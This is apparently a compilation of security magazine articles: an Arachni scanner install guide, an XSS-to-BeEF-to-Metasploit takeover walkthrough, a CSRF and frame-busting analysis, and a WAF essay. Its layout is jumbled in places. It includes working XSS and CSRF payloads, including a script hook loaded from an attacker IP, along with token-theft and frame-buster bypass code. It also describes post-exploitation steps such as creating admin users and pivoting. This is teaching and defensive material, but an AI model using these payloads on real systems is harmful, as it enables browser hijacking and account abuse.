This will install all source directories in your home directory. Change the cd commands if you want the sources somewhere else. In case you need an update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies.
Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:

• Database: libsqlite3-devel, libsql3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1. Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2. Installation for Windows

$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades. In any case, an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update and install some necessary modules:

$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the commands in Listing 2 in the Cygwin shell (note: these are the same commands as for the Linux installation).
In case of weird error messages regarding fork during compilation (especially on Vista systems), execute the following in your Cygwin shell:

$ find /usr/local -iname '*.so' > /tmp/localso.lst

Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin. Right-click ash.exe and choose Run as administrator. Enter in ash:

$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst

Exit ash.
Light my Fire
How you fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command line.
The GUI can be started by executing the following commands
$ arachni_rpcd &
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers. The dispatcher(s) will run the actual scan.

Figure 1. Edit Dispatchers
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1):

• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of which issues were detected and how far along the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL injection (SQLi) or Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as e-mail addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, ...
• Settings: the settings screens allow you to add cookies and headers, limit the scan to certain directories, ...
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher
  • Tutorial: serves as an example
  • Scheduler: schedules and runs scan jobs at a specific time
• Log: overview of actions taken by the GUI
Your First Scan
We will use both the command line and the GUI. First the command line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:

$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html

That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem for your assignment) and taking a lot more time to finish. List all modules with the following command:

$ arachni --lsmod

Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:

$ arachni --mods=*,-xss_* http://www.example.com

The above will load all modules except the modules related to Cross-Site Scripting (XSS).
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for a list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site: in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.

Figure 2. Start a Scan screen
Listing 3. Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>

  This is free software; you can copy, distribute and modify
  this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common directories on the server, based on wordlists
# generated from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author: Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file unless file.include?( '.' )
        }
    end

    def run( )
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )

            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }

        @@__audited << path
    end

    def self.info
        {
            :name           => 'SVNDigger Dirs',
            :description    => %q{Finds directories, based on wordlists
                created from open source repositories. The wordlist
                utilized by this module will be vast and will add a
                considerable amount of time to the overall scan time.},
            :author         => 'Herman Stevens <herman.stevens@gmail.com>',
            :version        => '0.1',
            :references     => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old,_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets        => { 'Generic' => 'all' },
            :issue          => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces are exposed
                    or confidential information.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.
Move into your Arachni source tree, where you'll find the modules directory. In there you'll find two directories: audit and recon. Move into the recon directory; this is where we will create our Ruby module.
Arachni makes it really easy: if your module needs external files, it will search a subdirectory with the same name. Example: if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needed to be protected and you forgot about it, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as in Listing 3.
The code does not need a lot of explanation: it checks whether or not a specific directory exists; if yes, it forwards the name to the Arachni Trainer (which will include the directory in further scans) and creates a report entry for it.
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:
• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection, with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).
Arachni lacks support for the following:

• No AJAX and JSON support
• No JavaScript support

This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through e-mail (hermanstevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup; this demonstrates that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would function in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).

A Simple POC
To start off though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you too can use on your web server if you want to try this:
HTML Page
<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search"></INPUT>
<INPUT TYPE="submit" name="Submit" value="Submit"></INPUT>
</FORM>
</BODY>
</HTML>
XSS, BeEF and Metasploit Exploitation

Figure 2. BeEF after configuration

Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.

Figure 1. What the user enters in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of clicking on a link which generates a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:

http://localhost/search1.php?search=<script src=
'http://192.168.56.101/beef/hook/beefmagic.js.php'>
</script>&Submit=Submit

The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane and then click on Standard Modules, Alert Dialog. This will result in a little popup box on the victim machine. Here's a screenshot which shows the same (Figure 4). And this is what the victim will see (Figure 5).
So, as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code

<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, his input is sent to the server, which reads the value of the parameter and prints it to the screen. So if, instead of simple text, the attacker enters a simple JavaScript into the box, the JavaScript will execute on the user's machine and not get displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1).
BeEF: Hook the user's browser
Now, while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not what an attacker will stop at. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract BeEF from the tarball and copy it into your web server directory

Figure 3. Connection with the BeEF controller
Figure 4. What the attacker will see
Figure 5. What the victim will see
Figure 6. Defacing the current web page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.

Defacing the Current Web Page
This results in the webpage being rewritten in the victim's browser with the text in the DEFACE STRING box. Try it out (Figure 6).

Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).

Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins on the user's browser
Figure 8. Starting Metasploit
Figure 9. The jobs command
Figure 10. Metasploit after clicking Send Now
Figure 11. Meterpreter window - screenshot 1
Figure 12. Meterpreter window - screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules, Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools, like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install these on this machine. We can then use these to port-scan an entire internal network or search for vulnerabilities in other services running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13. Meterpreter window - screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output as in a) must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for the same.
• Whitelist and blacklist filtering can also be used to completely disallow specific characters in user input fields.
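The whitelist approach from the last point can be sketched as follows (a hypothetical helper, not code from the article): characters outside an allowed set are simply dropped before the value is used.

```ruby
# Whitelist filtering: keep only characters known to be safe for this field.
def sanitize_search_term(input)
  input.gsub(/[^A-Za-z0-9 _.\-]/, '')
end

puts sanitize_search_term("<script>alert(1)</script>")  # => scriptalert1script
```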
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.

ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
E-mail: arvinddoraiswamy@gmail.com
LinkedIn: http://www.linkedin.com/pub/arvind-doraiswamy/39/b21/332
Other writings: http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: an evil website posts a new status to your Twitter account while your Twitter login session is still active.

CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com"
style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are weak defenses:

• Only accepting POST: this stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can still be created within frames, scripts, etc.
• Referrer checking: some users prohibit referrers, so you cannot simply require Referer headers; techniques to selectively create HTTP requests without referrers also exist.
• Requiring multi-step transactions: CSRF attacks can simply perform each step in order.
Defense
Two approaches used by many web developers are CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking users to fill in the text from a CAPTCHA image every time they submit a form might make them stop visiting your website. This is why websites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the currently active session of an authorized user.
Listing 1. HTML code used to bypass the protection

<div style="display:none">
  <iframe name="hiddenFrame"></iframe>
  <form name="Form" action="http://site.com/post.php"
        target="hiddenFrame" method="POST">
    <input type="text" name="message" value="I like www.evil.com">
    <input type="submit">
  </form>
  <script>document.Form.submit()</script>
</div>
index.php (victim website)

And the webpage which processes the request and stores the message only if the given token is correct:

post.php (victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4).
index.php (evil website)
For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'

var token = window.frames[0].document.forms['messageForm'].token.value;
Browser settings are not hard to modify, so the best way to achieve web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is to use FrameKillers together with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:

<script type="text/javascript">
if (top != self) top.location.replace(location);
</script>
A FrameKiller consists of a conditional statement and a counter-action statement.

Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, so that they can be compared after the form is submitted.
One-time tokens are usually subverted by brute-force attacks, and brute-forcing one-time tokens pays off only if a guessable generation mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2. Wrong token

<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Correct token

<?php
session_start();
if ($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, "$message\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1

<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
The best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>

This protects the web application even if an attacker browses the webpage with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvel.gevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006, then seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience shaped Samvel's work ethic, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF), http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. A real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms["messageForm"].elements["token"].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com">
<input type="hidden" name="token" value="">
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver the results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and our working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibility to simplify and accelerate business processes and make them more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of – and more powerful – applications that provide the internet user with the required functions as fast and simply as possible.

Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.

Above all, the common practice of adapting tried and tested technologies for developing web applications without subjecting them to prior security and qualification tests is dangerous. In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how much knowledge they had.

The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place, or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing websites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.

Some assume that an unsecured web application cannot cause any damage as long as it does not perform any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of further systems downstream, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who bear the big responsibility here towards all those who use their applications – one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.

As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher.

While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field. They now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes legitimate use easier, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and anonymous action. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.

Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of a new technology and the securing of that technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:

• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross-Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering

The only more recent trend: attackers have lately started to combine these methods more often in order to obtain even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify – with high efficiency – as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications that give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free under the required application conditions and security aspects, according to predefined guidelines. Companies would also have to raise the security of older web applications to the required standards later.

However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions; the developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that use no more than the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
If existing web applications display weak spots – and the probability is relatively high – then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity on whether and to what extent the problems must be resolved, or if further measures should be taken at the same time. Often, however, the program developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.

The situation is not much better with web applications that are developed from scratch. No software program ever went into productive operation free of errors or without weak spots. The shortcomings are frequently uncovered only over time, and by then correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority. The more securely a web application is written, the lower the improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.

